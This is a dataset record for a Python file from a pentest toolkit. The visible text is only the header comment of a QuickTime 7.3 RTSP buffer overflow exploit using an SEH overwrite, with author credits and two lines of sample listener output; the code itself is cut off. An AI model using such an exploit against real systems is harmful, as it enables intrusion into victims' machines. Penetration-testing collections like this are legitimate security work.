19,399 | quicktime.py | pwnieexpress_raspberry_pwn/src/pentest/fasttrack/bin/exploits/quicktime.py | #!/usr/bin/env python
#
# Quicktime 7.3 RTSP BufferOverflow Exploit
#
# Original DoS exploit by h07
# Rewritten by: ReL1K
# SEH Overwrite
#
# A ton of help from Muts from offensive-security.
#
# root@sslinux1:/home/relik/Desktop# python quicktime.py
# [+] Listening on [RTSP] 554
# [+] Connection accepted from: 10.211... | 4,189 | Python | .py | 113 | 35.40708 | 95 | 0.712319 | pwnieexpress/raspberry_pwn | 1,024 | 184 | 8 | GPL-3.0 | 9/5/2024, 5:12:22 PM (Europe/Amsterdam) |